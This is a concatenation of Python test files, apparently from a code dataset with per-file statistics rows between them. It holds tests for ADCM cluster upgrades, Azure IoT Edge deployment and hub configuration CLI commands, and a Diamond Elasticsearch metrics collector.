bundle_import_correct = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'cluster_with_correct_import'))
cluster_import = bundle_import_correct.cluster_create("cluster_import")
bind_service_and_cluster(cluster_import, service, cluster)
with allure.step('Upgrade cluster with import with error'):
upgr = cluster_import.upgrade(name='upgrade to 1.6')
with pytest.raises(coreapi.exceptions.ErrorMessage) as e:
upgr.do()
with allure.step('Check that cluster was not upgraded'):
err.UPGRADE_ERROR.equal(e)
@parametrize_by_data_subdirs(__file__, "upgradable_cluster_with_incorrect_version")
def test_incorrect_import_version(sdk_client_fs: ADCMClient, path):
"""Upgrade cluster with service incorrect version
Scenario:
1. Create cluster for upgrade with exports
2. Create upgradable cluster with import and incorrect version
3. Create service
4. Import service from cluster with export to cluster from step 2 (with import)
5. Upgrade cluster from step 1
6. Check that cluster was not upgraded because incorrect version for service
in cluster with import
"""
with allure.step('Create cluster for upgrade with exports and cluster with correct import'):
bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_export'))
sdk_client_fs.upload_from_fs(path)
bundle_import_correct = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'cluster_with_correct_import'))
cluster = bundle.cluster_create("test")
service = cluster.service_add(name="hadoop")
cluster_import = bundle_import_correct.cluster_create("cluster_import")
bind_service_and_cluster(cluster_import, service, cluster)
with allure.step('Upgrade cluster with import to 1.6 with error'):
upgr = cluster_import.upgrade(name='upgrade to 1.6')
with pytest.raises(coreapi.exceptions.ErrorMessage) as e:
upgr.do()
with allure.step('Check that cluster was not upgraded'):
err.UPGRADE_ERROR.equal(e)
def test_upgrade_cluster_without_service_config_in_import(sdk_client_fs: ADCMClient):
"""Upgrade cluster with service when in new cluster when
we haven't some service configuration variables
Scenario:
1. Create cluster for upgrade with export
2. Create upgradable cluster with import and without config in import
3. Bind service from cluster with export to cluster with import
4. Upgrade cluster with export
5. Check upgrade error
"""
with allure.step('Create cluster for upgrade with exports and cluster without config in import'):
bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_export'))
bundle_import = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgradable_cluster_without_service'))
cluster = bundle.cluster_create("test")
service = cluster.service_add(name="hadoop")
cluster_import = bundle_import.cluster_create("cluster_import")
with allure.step('Bind service from cluster with export to cluster with import'):
cluster_import.bind(service)
cluster_import.bind(cluster)
with allure.step('Upgrade cluster with export'):
upgr = cluster.upgrade(name='upgrade to 1.6')
with pytest.raises(coreapi.exceptions.ErrorMessage) as e:
upgr.do()
with allure.step('Check upgrade error'):
err.UPGRADE_ERROR.equal(e)
def test_upgrade_cluster_with_new_configuration_variables(sdk_client_fs: ADCMClient):
"""Upgrade to cluster with new configuration variables"""
with allure.step('Create cluster for upgrade with exports and cluster with import new config vars'):
bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_export'))
bundle_import = sdk_client_fs.upload_from_fs(
get_data_dir(__file__, 'upgradable_cluster_with_import_new_config_vars')
)
cluster = bundle.cluster_create("test")
service = cluster.service_add(name="hadoop")
cluster_config_before = cluster.config()
service_config_before = service.config()
cluster_import = bundle_import.cluster_create("cluster_import")
bind_service_and_cluster(cluster_import, service, cluster)
with allure.step('Upgrade cluster with export'):
upgr = cluster.upgrade(name='upgrade to 1.6')
upgr.do()
with allure.step('Check upgraded cluster'):
cluster.reread()
service.reread()
cluster_config_after = cluster.config()
service_config_after = service.config()
assert cluster.prototype().version == '1.6'
assert service.prototype().version == '2.2'
assert len(cluster_config_after) == 4, cluster_config_after
assert len(service_config_after) == 3, service_config_after
for variable in cluster_config_before:
assert cluster_config_before[variable] == cluster_config_after[variable]
for variable in service_config_before:
assert service_config_before[variable] == service_config_after[variable]
| 50.17734
| 116
| 0.737188
| 1,360
| 10,186
| 5.235294
| 0.103676
| 0.078792
| 0.043258
| 0.035815
| 0.823736
| 0.778652
| 0.763483
| 0.736938
| 0.700281
| 0.673876
| 0
| 0.007826
| 0.184567
| 10,186
| 202
| 117
| 50.425743
| 0.849386
| 0.211958
| 0
| 0.638462
| 0
| 0
| 0.212761
| 0.058944
| 0
| 0
| 0
| 0
| 0.092308
| 1
| 0.053846
| false
| 0
| 0.392308
| 0
| 0.446154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8105acec6e4a74a574d9ae4861c977f79f4a2eb4
| 30,709
|
py
|
Python
|
azext_iot/tests/iothub/configurations/test_iot_config_int.py
|
rido-min/azure-iot-cli-extension
|
bb3c5d9ebaa260b9fc186b08ba690813e0ad8932
|
[
"MIT"
] | null | null | null |
azext_iot/tests/iothub/configurations/test_iot_config_int.py
|
rido-min/azure-iot-cli-extension
|
bb3c5d9ebaa260b9fc186b08ba690813e0ad8932
|
[
"MIT"
] | 1
|
2021-04-26T20:31:10.000Z
|
2021-04-26T20:31:10.000Z
|
azext_iot/tests/iothub/configurations/test_iot_config_int.py
|
rido-min/azure-iot-cli-extension
|
bb3c5d9ebaa260b9fc186b08ba690813e0ad8932
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import random
import json
from azext_iot.tests import IoTLiveScenarioTest
from azext_iot.tests.conftest import get_context_path
from azext_iot.tests.iothub import DATAPLANE_AUTH_TYPES
from azext_iot.tests.settings import DynamoSettings, ENV_SET_TEST_IOTHUB_BASIC
from azext_iot.common.utility import read_file_content
settings = DynamoSettings(ENV_SET_TEST_IOTHUB_BASIC)
LIVE_HUB = settings.env.azext_iot_testhub
LIVE_RG = settings.env.azext_iot_testrg
edge_content_path = get_context_path(__file__, "test_edge_deployment.json")
edge_content_layered_path = get_context_path(
__file__, "test_edge_deployment_layered.json"
)
edge_content_v11_path = get_context_path(__file__, "test_edge_deployment_v11.json")
edge_content_v1_path = get_context_path(__file__, "test_edge_deployment_v1.json")
edge_content_malformed_path = get_context_path(
__file__, "test_edge_deployment_malformed.json"
)
generic_metrics_path = get_context_path(__file__, "test_config_generic_metrics.json")
adm_content_module_path = get_context_path(__file__, "test_adm_module_content.json")
adm_content_device_path = get_context_path(__file__, "test_adm_device_content.json")
class TestIoTEdgeSetModules(IoTLiveScenarioTest):
def __init__(self, test_case):
super(TestIoTEdgeSetModules, self).__init__(
test_case, LIVE_HUB, LIVE_RG
)
def test_edge_set_modules(self):
for auth_phase in DATAPLANE_AUTH_TYPES:
edge_device_count = 1
edge_device_ids = self.generate_device_names(edge_device_count, True)
self.cmd(
self.set_cmd_auth_type(
"iot hub device-identity create -d {} -n {} -g {} --ee".format(
edge_device_ids[0], LIVE_HUB, LIVE_RG
),
auth_type=auth_phase,
)
)
self.kwargs["edge_content"] = read_file_content(edge_content_path)
# Content inline
self.cmd(
self.set_cmd_auth_type(
"iot edge set-modules -d {} -n {} -g {} --content '{}'".format(
edge_device_ids[0], LIVE_HUB, LIVE_RG, "{edge_content}"
),
auth_type=auth_phase,
),
self.check("length([*])", 3),
)
# Content from file
self.cmd(
self.set_cmd_auth_type(
"iot edge set-modules -d {} -n {} -g {} -k '{}'".format(
edge_device_ids[0], LIVE_HUB, LIVE_RG, edge_content_v1_path
),
auth_type=auth_phase,
),
checks=[self.check("length([*])", 4)],
)
# Error schema validation - Malformed deployment
self.cmd(
self.set_cmd_auth_type(
"iot edge set-modules -d {} -n {} -g {} -k '{}'".format(
edge_device_ids[0], LIVE_HUB, LIVE_RG, edge_content_malformed_path
),
auth_type=auth_phase
),
expect_failure=True,
)
class TestIoTEdgeDeployments(IoTLiveScenarioTest):
def __init__(self, test_case):
super(TestIoTEdgeDeployments, self).__init__(
test_case, LIVE_HUB, LIVE_RG
)
def test_edge_deployments(self):
for auth_phase in DATAPLANE_AUTH_TYPES:
config_count = 5
config_ids = self.generate_config_names(config_count)
self.kwargs["generic_metrics"] = read_file_content(generic_metrics_path)
self.kwargs["edge_content"] = read_file_content(edge_content_path)
self.kwargs["edge_content_layered"] = read_file_content(
edge_content_layered_path
)
self.kwargs["edge_content_v1"] = read_file_content(edge_content_v1_path)
self.kwargs["edge_content_malformed"] = read_file_content(
edge_content_malformed_path
)
self.kwargs["labels"] = '{"key0": "value0"}'
priority = random.randint(1, 10)
condition = "tags.building=9 and tags.environment='test'"
# Content inline
# Note: $schema is included as a nested property in the sample content.
self.cmd(
self.set_cmd_auth_type(
"""iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --priority {}
--target-condition \"{}\" --labels '{}' --content '{}'""".format(
config_ids[0],
LIVE_HUB,
LIVE_RG,
priority,
condition,
"{labels}",
"{edge_content}",
),
auth_type=auth_phase,
),
checks=[
self.check("id", config_ids[0]),
self.check("priority", priority),
self.check("targetCondition", condition),
self.check("labels", json.loads(self.kwargs["labels"])),
self.check(
"content.modulesContent",
json.loads(self.kwargs["edge_content"])["content"][
"modulesContent"
],
),
self.check("metrics.queries", {}),
],
)
# Content + metrics from file. Configurations must be lowercase and will be lower()'ed.
# Note: $schema is included as a nested property in the sample content.
self.cmd(
self.set_cmd_auth_type(
"iot edge deployment create -d {} --pri {} --tc \"{}\" --lab '{}' -k '{}' --metrics '{}' -n {} -g {}".format(
config_ids[1].upper(),
priority,
condition,
"{labels}",
edge_content_path,
edge_content_path,
LIVE_HUB,
LIVE_RG
),
auth_type=auth_phase
),
checks=[
self.check("id", config_ids[1].lower()),
self.check("priority", priority),
self.check("targetCondition", condition),
self.check("labels", json.loads(self.kwargs["labels"])),
self.check(
"content.modulesContent",
json.loads(self.kwargs["edge_content"])["content"][
"modulesContent"
],
),
self.check(
"metrics.queries",
json.loads(self.kwargs["edge_content"])["metrics"]["queries"],
),
],
)
# Layered deployment with content + metrics from file.
# No labels, target-condition or priority
self.cmd(
self.set_cmd_auth_type(
"iot edge deployment create -d {} -k '{}' --metrics '{}' --layered -n {} -g {}".format(
config_ids[2].upper(),
edge_content_layered_path,
generic_metrics_path,
LIVE_HUB,
LIVE_RG,
),
auth_type=auth_phase
),
checks=[
self.check("id", config_ids[2].lower()),
self.check("priority", 0),
self.check("targetCondition", ""),
self.check("labels", None),
self.check(
"content.modulesContent",
json.loads(self.kwargs["edge_content_layered"])["content"][
"modulesContent"
],
),
self.check(
"metrics.queries",
json.loads(self.kwargs["generic_metrics"])["metrics"]["queries"],
),
],
)
# Content inline - Edge v1 format
self.cmd(
self.set_cmd_auth_type(
"""iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --priority {}
--target-condition \"{}\" --labels '{}' --content '{}' --metrics '{}'""".format(
config_ids[3],
LIVE_HUB,
LIVE_RG,
priority,
condition,
"{labels}",
"{edge_content_v1}",
"{generic_metrics}",
),
auth_type=auth_phase,
),
checks=[
self.check("id", config_ids[3]),
self.check("priority", priority),
self.check("targetCondition", condition),
self.check("labels", json.loads(self.kwargs["labels"])),
self.check(
"content.modulesContent",
json.loads(self.kwargs["edge_content_v1"])["content"][
"moduleContent"
],
),
self.check(
"metrics.queries",
json.loads(self.kwargs["generic_metrics"])["metrics"]["queries"],
),
],
)
# Error schema validation - Malformed deployment content causes validation error
self.cmd(
self.set_cmd_auth_type(
"""iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --priority {}
--target-condition \"{}\" --labels '{}' --content '{}'""".format(
config_ids[1],
LIVE_HUB,
LIVE_RG,
priority,
condition,
"{labels}",
"{edge_content_malformed}",
),
auth_type=auth_phase
),
expect_failure=True,
)
# Error schema validation - Layered deployment without flag causes validation error
self.cmd(
self.set_cmd_auth_type(
"""iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --priority {}
--target-condition \"{}\" --labels '{}' --content '{}'""".format(
config_ids[1],
LIVE_HUB,
LIVE_RG,
priority,
condition,
"{labels}",
"{edge_content_layered}",
),
auth_type=auth_phase
),
expect_failure=True,
)
# Uses IoT Edge hub schema version 1.1
self.cmd(
self.set_cmd_auth_type(
"""iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --priority {}
--target-condition \"{}\" --labels '{}' --content '{}'""".format(
config_ids[4],
LIVE_HUB,
LIVE_RG,
priority,
condition,
"{labels}",
edge_content_v11_path,
),
auth_type=auth_phase,
),
checks=[
self.check("id", config_ids[4]),
self.check("priority", priority),
self.check("targetCondition", condition),
self.check("labels", json.loads(self.kwargs["labels"])),
self.check(
"content.modulesContent",
json.loads(read_file_content(edge_content_v11_path))["modulesContent"],
),
self.check("metrics.queries", {}),
],
)
# Show deployment
self.cmd(
self.set_cmd_auth_type(
"iot edge deployment show --deployment-id {} --hub-name {} --resource-group {}".format(
config_ids[0], LIVE_HUB, LIVE_RG
),
auth_type=auth_phase,
),
checks=[
self.check("id", config_ids[0]),
self.check("priority", priority),
self.check("targetCondition", condition),
self.check("labels", json.loads(self.kwargs["labels"])),
],
)
# Update deployment
new_priority = random.randint(1, 10)
new_condition = "tags.building=43 and tags.environment='dev'"
self.kwargs["new_labels"] = '{"key": "super_value"}'
self.cmd(
self.set_cmd_auth_type(
"iot edge deployment update -d {} -n {} -g {} --set priority={} targetCondition=\"{}\" labels='{}'".format(
config_ids[0],
LIVE_HUB,
LIVE_RG,
new_priority,
new_condition,
"{new_labels}",
),
auth_type=auth_phase
),
checks=[
self.check("id", config_ids[0]),
self.check("priority", new_priority),
self.check("targetCondition", new_condition),
self.check("labels", json.loads(self.kwargs["new_labels"])),
],
)
# Evaluate metrics of a deployment
user_metric_name = "mymetric"
system_metric_name = "appliedCount"
config_output = self.cmd(
self.set_cmd_auth_type(
"iot edge deployment show --deployment-id {} -n {} -g {}".format(
config_ids[1],
LIVE_HUB,
LIVE_RG
),
auth_type=auth_phase
)
).get_output_in_json()
# Default metric type is user
self.cmd(
self.set_cmd_auth_type(
"iot edge deployment show-metric --metric-id {} --deployment-id {} --hub-name {}".format(
user_metric_name, config_ids[1], LIVE_HUB
),
auth_type=auth_phase
),
checks=[
self.check("metric", user_metric_name),
self.check(
"query", config_output["metrics"]["queries"][user_metric_name]
),
],
)
# System metric
self.cmd(
self.set_cmd_auth_type(
"iot edge deployment show-metric --metric-id {} --deployment-id {} --metric-type {} -n {} -g {}".format(
system_metric_name, config_ids[1], "system", LIVE_HUB, LIVE_RG
),
auth_type=auth_phase
),
checks=[
self.check("metric", system_metric_name),
self.check(
"query",
config_output["systemMetrics"]["queries"][system_metric_name],
),
],
)
# Error - metric does not exist
self.cmd(
self.set_cmd_auth_type(
"iot edge deployment show-metric -m {} -d {} -n {} -g {}".format(
"doesnotexist", config_ids[0], LIVE_HUB, LIVE_RG
),
auth_type=auth_phase
),
expect_failure=True,
)
config_list_check = [
self.check("length([*])", config_count),
self.exists("[?id=='{}']".format(config_ids[0])),
self.exists("[?id=='{}']".format(config_ids[1])),
self.exists("[?id=='{}']".format(config_ids[2])),
self.exists("[?id=='{}']".format(config_ids[3]))
]
# List all edge deployments
self.cmd(
self.set_cmd_auth_type(
"iot edge deployment list -n {} -g {}".format(LIVE_HUB, LIVE_RG),
auth_type=auth_phase
),
checks=config_list_check,
)
# Explicitly delete an edge deployment
self.cmd(
self.set_cmd_auth_type(
"iot edge deployment delete -d {} -n {} -g {}".format(
config_ids[0], LIVE_HUB, LIVE_RG
),
auth_type=auth_phase
)
)
# Validate deletion
self.cmd(
self.set_cmd_auth_type(
"iot edge deployment show -d {} -n {} -g {}".format(
config_ids[0], LIVE_HUB, LIVE_RG
),
auth_type=auth_phase
),
expect_failure=True
)
self.tearDown()
class TestIoTHubConfigurations(IoTLiveScenarioTest):
def __init__(self, test_case):
super(TestIoTHubConfigurations, self).__init__(
test_case, LIVE_HUB, LIVE_RG
)
def test_device_configurations(self):
config_count = 3
config_ids = self.generate_config_names(config_count)
edge_config_ids = self.generate_config_names(1, True)
self.kwargs["generic_metrics"] = read_file_content(generic_metrics_path)
self.kwargs["adm_content_device"] = read_file_content(adm_content_device_path)
self.kwargs["adm_content_module"] = read_file_content(adm_content_module_path)
self.kwargs["edge_content"] = read_file_content(edge_content_path)
self.kwargs["labels"] = '{"key0": "value0"}'
priority = random.randint(1, 10)
condition = "tags.building=9 and tags.environment='test'"
for auth_phase in DATAPLANE_AUTH_TYPES:
# Device content inline
# Note: $schema is included as a nested property in the sample content.
self.cmd(
self.set_cmd_auth_type(
"""iot hub configuration create --config-id {} --hub-name {} --resource-group {} --priority {}
--target-condition \"{}\" --labels '{}' --content '{}'""".format(
config_ids[0],
LIVE_HUB,
LIVE_RG,
priority,
condition,
"{labels}",
"{adm_content_device}",
),
auth_type=auth_phase
),
checks=[
self.check("id", config_ids[0]),
self.check("priority", priority),
self.check("targetCondition", condition),
self.check("labels", json.loads(self.kwargs["labels"])),
self.check(
"content.deviceContent",
json.loads(self.kwargs["adm_content_device"])["content"][
"deviceContent"
],
),
self.check("metrics.queries", {}),
],
)
# Module content + metrics from file.
# Configurations must be lowercase and will be lower()'ed.
# Note: $schema is included as a nested property in the sample content.
module_condition = "{} {}".format("FROM devices.modules WHERE", condition)
self.cmd(
self.set_cmd_auth_type(
"iot hub configuration create -c {} --pri {} --tc \"{}\" --lab '{}' -k '{}' -m '{}' -n {} -g {}".format(
config_ids[1].upper(),
priority,
module_condition,
"{labels}",
adm_content_module_path,
adm_content_module_path,
LIVE_HUB,
LIVE_RG
),
auth_type=auth_phase,
),
checks=[
self.check("id", config_ids[1].lower()),
self.check("priority", priority),
self.check("targetCondition", module_condition),
self.check("labels", json.loads(self.kwargs["labels"])),
self.check(
"content.moduleContent",
json.loads(self.kwargs["adm_content_module"])["content"][
"moduleContent"
],
),
self.check(
"metrics.queries",
json.loads(self.kwargs["adm_content_module"])["metrics"]["queries"],
),
],
)
# Device content + metrics from file.
# Configurations must be lowercase and will be lower()'ed.
# No labels, target-condition or priority
self.cmd(
self.set_cmd_auth_type(
"iot hub configuration create -c {} -k '{}' --metrics '{}' -n {} -g {}".format(
config_ids[2].upper(),
adm_content_device_path,
generic_metrics_path,
LIVE_HUB,
LIVE_RG
),
auth_type=auth_phase
),
checks=[
self.check("id", config_ids[2].lower()),
self.check("priority", 0),
self.check("targetCondition", ""),
self.check("labels", None),
self.check(
"content.deviceContent",
json.loads(self.kwargs["adm_content_device"])["content"][
"deviceContent"
],
),
self.check(
"metrics.queries",
json.loads(self.kwargs["generic_metrics"])["metrics"]["queries"],
),
],
)
# Error validation - Malformed configuration content causes validation error
# In this case we attempt to use an edge deployment ^_^
self.cmd(
self.set_cmd_auth_type(
"""iot hub configuration create --config-id {} --hub-name {} --resource-group {} --priority {}
--target-condition \"{}\" --labels '{}' --content '{}'""".format(
config_ids[1],
LIVE_HUB,
LIVE_RG,
priority,
condition,
"{labels}",
"{edge_content}",
),
auth_type=auth_phase
),
expect_failure=True,
)
# Error validation - Module configuration target condition must start with 'from devices.modules where'
module_condition = "{} {}".format("FROM devices.modules WHERE", condition)
self.cmd(
self.set_cmd_auth_type(
"iot hub configuration create -c {} -k '{}' -n {} -g {}".format(
config_ids[1].upper(),
adm_content_module_path,
LIVE_HUB,
LIVE_RG
),
auth_type=auth_phase
),
expect_failure=True,
)
# Show ADM configuration
self.cmd(
self.set_cmd_auth_type(
"iot hub configuration show --config-id {} --hub-name {} --resource-group {}".format(
config_ids[0], LIVE_HUB, LIVE_RG
),
auth_type=auth_phase
),
checks=[
self.check("id", config_ids[0]),
self.check("priority", priority),
self.check("targetCondition", condition),
self.check("labels", json.loads(self.kwargs["labels"])),
],
)
# Update deployment
new_priority = random.randint(1, 10)
new_condition = "tags.building=43 and tags.environment='dev'"
self.kwargs["new_labels"] = '{"key": "super_value"}'
self.cmd(
self.set_cmd_auth_type(
"iot hub configuration update -c {} -n {} -g {} --set priority={} targetCondition=\"{}\" labels='{}'".format(
config_ids[0],
LIVE_HUB,
LIVE_RG,
new_priority,
new_condition,
"{new_labels}",
),
auth_type=auth_phase,
),
checks=[
self.check("id", config_ids[0]),
self.check("priority", new_priority),
self.check("targetCondition", new_condition),
self.check("labels", json.loads(self.kwargs["new_labels"])),
],
)
# Evaluate metrics of a deployment
user_metric_name = "mymetric"
system_metric_name = "appliedCount"
config_output = self.cmd(
self.set_cmd_auth_type(
"iot hub configuration show --config-id {} -n {} -g {}".format(
config_ids[1], LIVE_HUB, LIVE_RG
),
auth_type=auth_phase,
)
).get_output_in_json()
# Default metric type is user
self.cmd(
self.set_cmd_auth_type(
"iot hub configuration show-metric --metric-id {} --config-id {} --hub-name {}".format(
user_metric_name, config_ids[1], LIVE_HUB
),
auth_type=auth_phase
),
checks=[
self.check("metric", user_metric_name),
self.check(
"query", config_output["metrics"]["queries"][user_metric_name]
),
],
)
# System metric
self.cmd(
self.set_cmd_auth_type(
"iot hub configuration show-metric --metric-id {} --config-id {} --metric-type {} -n {} -g {}".format(
system_metric_name, config_ids[1], "system", LIVE_HUB, LIVE_RG
),
auth_type=auth_phase,
),
checks=[
self.check("metric", system_metric_name),
self.check(
"query",
config_output["systemMetrics"]["queries"][system_metric_name],
),
],
)
# Error - metric does not exist, using connection string
self.cmd(
self.set_cmd_auth_type(
"iot hub configuration show-metric -m {} -c {} -n {} -g {}".format(
"doesnotexist", config_ids[0], LIVE_HUB, LIVE_RG
),
auth_type=auth_phase,
),
expect_failure=True,
)
# Create Edge deployment to ensure it doesn't show up on ADM list
self.cmd(
self.set_cmd_auth_type(
"""iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --content '{}'""".format(
edge_config_ids[0],
LIVE_HUB,
LIVE_RG,
"{edge_content}",
),
auth_type=auth_phase
)
)
config_list_check = [
self.check("length([*])", config_count),
self.exists("[?id=='{}']".format(config_ids[0])),
self.exists("[?id=='{}']".format(config_ids[1])),
self.exists("[?id=='{}']".format(config_ids[2]))
]
# List all ADM configurations
self.cmd(
self.set_cmd_auth_type(
"iot hub configuration list -n {} -g {}".format(LIVE_HUB, LIVE_RG),
auth_type=auth_phase
),
checks=config_list_check,
)
# Explicitly delete an ADM configuration
self.cmd(
self.set_cmd_auth_type(
"iot hub configuration delete -c {} -n {} -g {}".format(
config_ids[0], LIVE_HUB, LIVE_RG
),
auth_type=auth_phase
)
)
# Validate deletion
self.cmd(
self.set_cmd_auth_type(
"iot hub configuration show -c {} -n {} -g {}".format(
config_ids[0], LIVE_HUB, LIVE_RG
),
auth_type=auth_phase,
),
expect_failure=True
)
self.tearDown()
| 41
| 129
| 0.443193
| 2,620
| 30,709
| 4.924427
| 0.079771
| 0.053015
| 0.030693
| 0.036273
| 0.857076
| 0.824911
| 0.812045
| 0.778871
| 0.73849
| 0.727562
| 0
| 0.005915
| 0.444007
| 30,709
| 748
| 130
| 41.054813
| 0.749736
| 0.070077
| 0
| 0.77044
| 0
| 0.007862
| 0.153906
| 0.020935
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009434
| false
| 0
| 0.011006
| 0
| 0.025157
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
814114d197feb276d63cccb1fd0d1d82d501fed1
| 17,567
|
py
|
Python
|
src/collectors/elasticsearch/test/testelasticsearch.py
|
hermdog/Diamond
|
0f3eb04327d6d3ed5e53a9967d6c9d2c09714a47
|
[
"MIT"
] | 1,795
|
2015-01-05T11:14:55.000Z
|
2022-03-25T12:07:15.000Z
|
src/collectors/elasticsearch/test/testelasticsearch.py
|
hermdog/Diamond
|
0f3eb04327d6d3ed5e53a9967d6c9d2c09714a47
|
[
"MIT"
] | 671
|
2015-01-02T05:57:27.000Z
|
2022-03-29T22:39:05.000Z
|
src/collectors/elasticsearch/test/testelasticsearch.py
|
hermdog/Diamond
|
0f3eb04327d6d3ed5e53a9967d6c9d2c09714a47
|
[
"MIT"
] | 793
|
2015-01-03T01:39:02.000Z
|
2022-02-18T05:12:27.000Z
|
#!/usr/bin/python
# coding=utf-8
##########################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from elasticsearch import ElasticSearchCollector
##########################################################################
class TestElasticSearchCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('ElasticSearchCollector', {})
self.collector = ElasticSearchCollector(config, None)
def test_import(self):
self.assertTrue(ElasticSearchCollector)
def test_new__instances_default(self):
config = get_collector_config('ElasticSearchCollector', {})
self.collector = ElasticSearchCollector(config, None)
self.assertEqual(self.collector.instances, {'': ('127.0.0.1', 9200)})
def test_new__instances_single(self):
config = get_collector_config('ElasticSearchCollector', {
'instances': 'bla'})
self.collector = ElasticSearchCollector(config, None)
self.assertEqual(self.collector.instances, {'default': ('bla', 9200)})
def test_new__instances_multi(self):
config = get_collector_config('ElasticSearchCollector', {
'instances': [
'something',
'foo@1234',
'bar@bla:1234',
]})
self.collector = ElasticSearchCollector(config, None)
self.assertEqual(self.collector.instances, {
'default': ('something', 9200),
'foo': ('1234', 9200),
'bar': ('bla', 1234),
})
@patch.object(Collector, 'publish')
def test_should_work_with_real_data_and_basic_auth(self, publish_mock):
self.collector.config["user"] = "user"
self.collector.config["password"] = "password"
self.test_should_work_with_real_data()
@patch.object(Collector, 'publish')
def test_should_work_with_real_data(self, publish_mock):
returns = [
self.getFixture('stats'),
self.getFixture('cluster_stats'),
self.getFixture('indices_stats'),
]
urlopen_mock = patch('urllib2.urlopen', Mock(
side_effect=lambda *args: returns.pop(0)))
self.collector.config['cluster'] = True
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
# check how many fixtures were consumed
self.assertEqual(urlopen_mock.new.call_count, 3)
metrics = {
'http.current': 1,
'indices.docs.count': 11968062,
'indices.docs.deleted': 2692068,
'indices.datastore.size': 22724243633,
'indices._all.docs.count': 4,
'indices._all.docs.deleted': 0,
'indices._all.datastore.size': 2674,
'indices.test.docs.count': 4,
'indices.test.docs.deleted': 0,
'indices.test.datastore.size': 2674,
'process.cpu.percent': 58,
'process.mem.resident': 5192126464,
'process.mem.share': 11075584,
'process.mem.virtual': 7109668864,
'disk.reads.count': 55996,
'disk.reads.size': 1235387392,
'disk.writes.count': 5808198,
'disk.writes.size': 23287275520,
'thread_pool.generic.threads': 1,
'network.tcp.active_opens': 2299,
'jvm.mem.pools.CMS_Old_Gen.used': 530915016,
'cluster_health.nodes.total': 3,
'cluster_health.nodes.data': 3,
'cluster_health.shards.active_primary': 5,
'cluster_health.shards.active': 10,
'cluster_health.shards.relocating': 0,
'cluster_health.shards.unassigned': 0,
'cluster_health.shards.initializing': 0,
'cluster_health.status': 2,
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_work_with_real_data_v2(self, publish_mock):
returns = [
self.getFixture('stats'),
self.getFixture('cluster_stats_v2'),
self.getFixture('indices_stats'),
]
urlopen_mock = patch('urllib2.urlopen', Mock(
side_effect=lambda *args: returns.pop(0)))
self.collector.config['cluster'] = True
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
# check how many fixtures were consumed
self.assertEqual(urlopen_mock.new.call_count, 3)
metrics = {
'http.current': 1,
'indices.docs.count': 11968062,
'indices.docs.deleted': 2692068,
'indices.datastore.size': 22724243633,
'indices._all.docs.count': 4,
'indices._all.docs.deleted': 0,
'indices._all.datastore.size': 2674,
'indices.test.docs.count': 4,
'indices.test.docs.deleted': 0,
'indices.test.datastore.size': 2674,
'process.cpu.percent': 58,
'process.mem.resident': 5192126464,
'process.mem.share': 11075584,
'process.mem.virtual': 7109668864,
'disk.reads.count': 55996,
'disk.reads.size': 1235387392,
'disk.writes.count': 5808198,
'disk.writes.size': 23287275520,
'thread_pool.generic.threads': 1,
'network.tcp.active_opens': 2299,
'jvm.mem.pools.CMS_Old_Gen.used': 530915016,
'cluster_health.nodes.pending_tasks': 266,
'cluster_health.nodes.data': 4,
'cluster_health.nodes.total': 8,
'cluster_health.shards.active_primary': 10,
'cluster_health.shards.active': 30,
'cluster_health.shards.active_percent': 100,
'cluster_health.shards.delayed_unassigned': 0,
'cluster_health.shards.relocating': 0,
'cluster_health.shards.unassigned': 0,
'cluster_health.shards.initializing': 0,
'cluster_health.status': 2,
}
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_work_with_real_data_logstash_mode(self, publish_mock):
returns = [
self.getFixture('stats'),
self.getFixture('logstash_indices_stats'),
]
urlopen_mock = patch('urllib2.urlopen', Mock(
side_effect=lambda *args: returns.pop(0)))
self.collector.config['logstash_mode'] = True
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
# check how many fixtures were consumed
self.assertEqual(urlopen_mock.new.call_count, 2)
# Omit all non-indices metrics, since those were already
# checked in previous test.
metrics = {
'indices.docs.count': 11968062,
'indices.docs.deleted': 2692068,
'indices.datastore.size': 22724243633,
'indices._all.docs.count': 35856619,
'indices._all.docs.deleted': 0,
'indices._all.datastore.size': 21903813340,
'indices._all.get.exists_time_in_millis': 0,
'indices._all.get.exists_total': 0,
'indices._all.get.missing_time_in_millis': 0,
'indices._all.get.missing_total': 0,
'indices._all.get.time_in_millis': 0,
'indices._all.get.total': 0,
'indices._all.indexing.delete_time_in_millis': 0,
'indices._all.indexing.delete_total': 0,
